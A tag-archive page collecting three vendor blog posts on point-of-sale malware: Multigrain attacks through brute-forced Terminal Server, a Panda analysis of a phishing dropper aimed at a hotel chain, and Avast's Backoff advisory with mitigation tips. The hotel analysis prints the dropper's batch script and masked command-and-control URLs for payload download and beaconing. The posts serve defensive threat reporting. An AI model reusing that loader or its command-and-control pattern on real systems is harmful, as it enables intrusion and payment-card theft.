Tag Archives: POS

Point of Sale attacks through Terminal Server

img-tpvs

Some months ago we published a technical analysis of Multigrain, a Point of Sale Trojan that uses DNS petitions in order to exfiltrate stolen information. We also wrote about one case where this PoS malware was used to infect hundreds of restaurants in the United States.

At the end of September we have seen again activity, with new attacks infecting PoS with new Multigrain variants. However, unlike this previous attack that was targeting the same kind of victims in a region (restaurants in the US) now it looks like cybercriminals are trying to find new fields where they can maximize their profit. We have seen 2 waves of attacks which victims were companies from a number of countries:

  • Argentina
  • Belgium
  • Brazil
  • Chile
  • France
  • Germany
  • India
  • Ireland
  • Norway
  • Spain
  • Sweden
  • Thailand
  • UK
  • USA

They were from different industries, including the typical restaurants and hotels, but also others not that common in these attacks: Telecommunications, Business IT Services, Engineering, Cargo Insurance, Medical Services, Logistics, Accountants, Medical Services, Unions, Engineering and Industrial Machinery Suppliers.

Why the disparity in victim profiles? It looks like the attackers were not looking for these specific industries. All attacks have been perpetrated through Terminal Server, similar to what we have seen in other cases, using brute-force attacks until they can break into the computers and infect them with Multigrain. These are automated attacks, where cybercriminals start scanning the Internet looking for potential victims, and once located they launch the attack until they gain access.

Tips to prevent attacks in companies

In order to minimize the risk, companies must remember that these services, when possible, are better out of the Internet. In case there is a need for them to be in the open, be sure to use strong credentials (with a strong enough password you can basically avoid brute-force attacks), to use 2FA when possible, use non-standard ports and of course monitor all incoming connections from the outside.

 

The post Point of Sale attacks through Terminal Server appeared first on Panda Security Mediacenter.

Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

advanced attacks hotels

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite that the Word icon shows up, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file is shown below:

@echo off

start “” ROCA.ING.docx

Set xOS=x64

If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86

IF “%xOS%” == “x64” (start “” C:WindowsSysWOW64rundll32.exe adobeUpd.dll,Wenk)

IF “%xOS%” == “x86” (start “” C:WindowsSystem32rundll32.exe adobeUpd.dll,Wenk)

ping -n 12 localhost

As we can see, the first thing it does to its victim is open the Word document in order to run and complete the trick. Then, adobeUpd.dll runs with the parameter “Wenk”. While executed, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.

Contact with a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

Then it downloads a file that contains the user of the given URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be in our customer system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same domain as our customer, except that they have “.com” while the attackers registered a domain with the same name but in Gabon (“.ga”). This way, the similarity to the domain name won’t attract attention if it is seen by the hotel’s security team when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code adobeUpd.dll we can see that they are actually looking for a specific mark in this file, then it decrypts the data from it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is specifically directed to this hotel chain. The criminals have already removed all traces of the server where you could connect to the malware, and as we aborted the attack we can only speculate what is what they were going to do next. In our experience, this type of attacks seeks to engage a team of the enterprise of the victim to then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

The traditional anti-virus does not work against this type of attack, since they are threats created specifically for a victim and they always ensure that the malware is not detected by signatures, proactive technologies, etc. that current anti-malware solutions have built. That is why have EDR type of services (Endpoint Detection & Response) are equipped with advanced protection technology, something vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Bad news for SMBs: Target’s “Backoff” malware attack hits 1,000 more businesses

PoS attacks

avast! Endpoint Protection can protect your network

U.S. merchants advised to protect themselves against same PoS hack that hit Target and Neiman Marcus last year.

More than 1,000 U.S. businesses have had their systems infected by Backoff, a point-of-sale (PoS) malware that was linked to the remote-access attacks against Target, Michaels, and P.F. Chang’s last year and more recently, UPS and Dairy Queen. In the Target breach alone, 40 million credit and debit cards were stolen, along with 70 million records which included the name, address, email address, and phone number of Target shoppers.

The way these breaches occur is laid out in BACKOFF: New Point of Sale Malware, a new U.S. Department of Homeland Security (DHS) report. Investigations reveal that cybercrooks use readily available tools to identify businesses that use remote desktop applications which allow a user to connect to a computer from a remote location. The Target breach began with stolen login credentials from the air-conditioning repairman.

Once the business is identified, the hackers use brute force to break into the login feature of the remote desktop solution. After gaining access to administrator or privileged access accounts, the cybercrooks are then able to deploy the PoS malware and steal consumer payment data. If that’s not enough, most versions of Backoff have keylogging functionality and can also upload discovered data, update the malware, download/execute further malware, and uninstall the malware.

General steps SMBs and consumers can take to protect themselves

  • You should use a proper security solution, like avast! Endpoint Protection, to protect your network from hacking tools, malicious modules, and from hackers using exploits as a gateway to insert malware into your network.
  • Regularly monitor your bank and credit card statements to make sure all the transactions are legitimate.
  • Change default and staff passwords controlling access to key payment systems and applications. Our blog post, Do you hate updating your passwords whenever there’s a new hack?, has some tips.
  • Monitor your credit report for any changes. You’re entitled to one free report per year from each of the three reporting agencies.

Specific tips to protect your business and customers

Remote Desktop Access

  • Configure the account lockout settings to lock a user account after a period of time or a specified number of failed login attempts.
  • Limit the number of users and workstations who can log in using Remote Desktop.
  • Use firewalls to restrict access to remote desktop listening ports.

Network Security

  • Review firewall configurations and ensure that only allowed ports, services and Internet protocol (IP) addresses are communicating with your network.
  • Segregate payment processing networks from other networks.

Cash Register and PoS Security

  • Implement hardware-based point-to-point encryption. It is recommended that EMV-enabled PIN entry devices or other credit-only accepting devices have Secure Reading and Exchange of Data (SRED) capabilities.
  • Install Payment Application Data Security Standard-compliant payment applications.
  • Deploy the latest version of an operating system and ensure it is up to date with security patches, anti-virus software, file integrity monitoring and a host-based intrusion-detection system.

See more mitigation and prevention strategies from DHS.

Learn more about PoS attacks against small and medium-sized business in our blog, Should small and medium-sized businesses be worried about PoS attacks?

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun and contest information, please follow us on Facebook, Twitter, Google+ and Instagram. Business owners – check out our business products.